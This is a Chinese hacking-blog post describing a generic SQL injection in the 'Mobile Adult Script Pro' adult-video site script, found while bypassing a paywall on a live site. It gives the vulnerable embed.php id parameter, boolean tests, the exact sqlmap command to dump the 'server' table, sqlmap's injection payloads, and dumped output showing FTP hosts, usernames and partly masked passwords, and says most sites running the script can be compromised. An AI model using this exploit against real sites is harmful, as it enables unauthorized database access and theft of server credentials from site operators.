纵有疾风起
人生不言弃
首页 > 博客 > 黑客攻防 > 正文

某国外成人网站系统通用型SQL注入漏洞 – 网站安

2020-10-10 分类:黑客攻防 阅读(192) 评论(0) 扫描二维码 隐藏侧边
通过测试此版本均有SQL注入 漏洞 但网站程序需要购买所以不清楚版本号 通过读取 数据库server表可以得到ftp地址和用户密码   起因是因为国内某绅士网站观看学习视频需要积分,于是找到了视频播放页面就可以绕过积分限制了,后来测试了一下1=2会报错,sqlmap跑下库妥妥儿的。后来用手机登录网站发现标题和电脑登录的标题不同,显示的是Mobile Adult Script Pro 这个一看就是通用程序嘛,谷歌一下到官网发现官网提供的demo里面可以重现漏洞。 http://www.adultscriptpro.com/demo.html     google一下标题会发现不少使用此套程序的,有的需要改一下路径,基本全都可以搞定。   http://www.xxx.com/modules/video/player/nuevo/embed.php?id=2806 and 1=1 某国外成人网站系统通用型SQL注入漏洞 – 网站安插图
  http://www.xxx.com/modules/video/player/nuevo/embed.php?id=2806 and 1=2 某国外成人网站系统通用型SQL注入漏洞 – 网站安插图1   python sqlmap.py -u http://www.xxx.xxx/modules/video/player/nuevo/embed.php?id=2806 –dump -T server -D xxx -v 0       sqlmap identified the following injection points with a total of 0 HTTP(s) requests:   

---

Place: GET

Parameter: id

    Type: boolean-based blind

    Title: AND boolean-based blind - WHERE or HAVING clause

    Payload: id=2806 AND 6581=6581



    Type: error-based

    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause

    Payload: id=2806 AND (SELECT 7265 FROM(SELECT COUNT(*),CONCAT(0x716e6a6471,(SELECT (CASE WHEN (7265=7265) THEN 1 ELSE 0 END)),0x716b767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)



    Type: AND/OR time-based blind

    Title: MySQL > 5.0.11 AND time-based blind

    Payload: id=2806 AND SLEEP(5)

---

web application technology: PHP 5.4.26

back-end DBMS: MySQL 5.0

Database: ***

Table: server

[1 entry]

+-----------+--------------+---------+--------+----------+----------+----------------+---------------------+----------------+--------------------------------+----------------------+--------------+--------------+--------------+-----------------+------------------+------------------+----------------------+

| server_id | total_videos | url     | status | ftp_port | ftp_root | ftp_host       | last_used           | server_name    | rtmp_stream                    | lighttpd_url         | ftp_username | lighttpd_key | ftp_password | lighttpd_prefix | streaming_server | streaming_method | lighttpd_secdownload |

+-----------+--------------+---------+--------+----------+----------+----------------+---------------------+----------------+--------------------------------+----------------------+--------------+--------------+--------------+-----------------+------------------+------------------+----------------------+

| 2         | 2974         | <blank> | 1      | 21       | /        | 16手.21动.5打.21码 | 2014-06-24 09:35:14 | 16手.21动.5打.21码 | rtmp://16手.21动.5打.21码:1935/vod | http://www.xxx.com | ***         | P4ss#w0rD    | zx*****121   | /stream/        | apache           | rtmp             | 0                    |

+-----------+--------------+---------+--------+----------+----------+----------------+---------------------+----------------+--------------------------------+----------------------+--------------+--------------+--------------+-----------------+------------------+------------------+----------------------+

 
    上一篇: CRLF Injection漏洞的利用与实例分析 – 网站安全 –

    下一篇: PHP查询登录中的sql注入 – 网站安全 – 自学php

AD:【更多看点】学生“冒死”偷拍老师,当看到最后一个,网友:这谁能顶得住

 收藏 (0)
未经允许不得转载:起风网 » 某国外成人网站系统通用型SQL注入漏洞 – 网站安
分享到: 生成海报
标签:

825e5b70b68d744d

相关推荐

评论 抢沙发

评论前必须登录!

立即登录